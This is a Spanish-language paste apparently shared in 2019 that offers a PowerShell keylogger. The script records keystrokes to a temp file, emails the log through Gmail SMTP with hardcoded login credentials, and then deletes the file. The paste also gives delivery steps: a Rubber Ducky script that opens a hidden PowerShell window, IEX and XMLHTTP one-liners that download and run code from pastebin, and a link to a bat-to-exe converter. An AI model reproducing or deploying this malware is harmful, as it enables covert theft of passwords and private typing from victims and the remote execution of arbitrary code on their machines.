· 6 years ago · Sep 28, 2019, 05:36 PM
1=============================================================================
2----------------------------------------------------------------------------
3 SIMPLE KEYLOGGER ERRO404
4-----------------------------------------------------------------------------
5=============================================================================
6
7
8# Editar solo esta sección!
9$TimeToRun = 30
10$From
11
12= "lendys66@gmail.com"
13$Pass = "angelhernandez"
14$To = "User2@gmail.com"
15$Subject = "Keylogger Results"
16$body = "Keylogger
17
18Results"
19$SMTPServer = "smtp.gmail.com"
20$SMTPPort = "587"
21$credentials = new-object Management.Automation.PSCredential $From,
22
23($Pass | ConvertTo-SecureString -AsPlainText -Force)
24############################
25
26
27$TimeStart = Get-Date
28$TimeEnd =
29
30$timeStart.addminutes($TimeToRun)
31
32#requires -Version 2
33function Start-KeyLogger($Path="$env:temp\keylogger.txt")
34{
35 #
36
37Signatures for API Calls
38 $signatures = @'
39[DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
40public static
41
42extern short GetAsyncKeyState(int virtualKeyCode);
43[DllImport("user32.dll", CharSet=CharSet.Auto)]
44public static extern int
45
46GetKeyboardState(byte[] keystate);
47[DllImport("user32.dll", CharSet=CharSet.Auto)]
48public static extern int MapVirtualKey(uint
49
50uCode, int uMapType);
51[DllImport("user32.dll", CharSet=CharSet.Auto)]
52public static extern int ToUnicode(uint wVirtKey, uint
53
54wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
55'@
56
57 # load signatures and make
58
59members available
60 $API = Add-Type -MemberDefinition $signatures -Name 'Win32' -Namespace API -PassThru
61
62 # create output
63
64file
65 $null = New-Item -Path $Path -ItemType File -Force
66
67 try
68 {
69
70 # create endless loop. When user presses CTRL+C,
71
72finally-block
73 # executes and shows the collected key presses
74 while ($TimeEnd -ge $TimeNow) {
75 Start-Sleep -
76
77Milliseconds 40
78
79 # scan all ASCII codes above 8
80 for ($ascii = 9; $ascii -le 254; $ascii++) {
81 # get
82
83current key state
84 $state = $API::GetAsyncKeyState($ascii)
85
86 # is key pressed?
87 if ($state -eq -32767) {
88
89
90 $null = [console]::CapsLock
91
92 # translate scan code to real code
93 $virtualKey = $API::MapVirtualKey
94
95($ascii, 3)
96
97 # get keyboard state for virtual keys
98 $kbstate = New-Object Byte[] 256
99 $checkkbstate =
100
101$API::GetKeyboardState($kbstate)
102
103 # prepare a StringBuilder to receive input key
104 $mychar = New-Object -
105
106TypeName System.Text.StringBuilder
107
108 # translate virtual key
109 $success = $API::ToUnicode($ascii, $virtualKey,
110
111$kbstate, $mychar, $mychar.Capacity, 0)
112
113 if ($success)
114 {
115 # add key to logger file
116
117
118[System.IO.File]::AppendAllText($Path, $mychar, [System.Text.Encoding]::Unicode)
119 }
120 }
121 }
122 $TimeNow =
123
124Get-Date
125 }
126 }
127 finally
128 {
129 # open logger file in Notepad
130 send-mailmessage -from $from -to $to -subject $Subject -body
131
132$body -Attachment $Path -smtpServer $smtpServer -port $SMTPPort -credential $credentials -usessl
133 Remove-Item -Path
134
135$Path -force
136 exit 1
137 }
138}
139
140# records all key presses until script is aborted by pressing CTRL+C
141# will then open the file with
142
143collected key codes
144Start-KeyLogger
145
146
147---------------------------------------------------------------------------------------
148***************************************************************************************
149---------------------------------------------------------------------------------------
150
151 IEX (New-Object
152
153Net.WebClient).DownloadString('https://pastebin.com/raw/')
154
155-----------------------------------------------------------------------------------------
156***************************************************************************************
157-----------------------------------------------------------------------------------------
158
159
160DATOS DEL RUBBER DUCKY
161
162DELAY 1000
163GUI
164
165r
166DELAY 100
167STRING powershell -WindowStyle hidden
168ENTER
169DELAY 1000
170STRING IEX (New-Object Net.WebClient).DownloadString
171
172('https://pastebin.com/raw/')
173ENTER
174
175
176---------------------------------------------------------------------------------------------
177********************************************************************************************
178---------------------------------------------------------------------------------------------
179
180
181PAGINA EN DONDE SE CARGA EL
182
183CODIGO
184
185https://pastebin.com
186
187PAGINA DESCARGA BAT TO EXE
188http://www.battoexeconverter.com/
189
190
191---------------------------------------------------------------------------------------------
192*******************************************************************************************
193--------------------------------------------------------------------------------------------
194
195
196DATOS DEL BAT
197
198powershell -w h -c
199
200$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','https://pastebin.com/raw/',$false);$h.send();iex $h.responseText
201
202
203----------------------------------------------------------------------------------------------
204**********************************************************************************************
205----------------------------------------------------------------------------------------------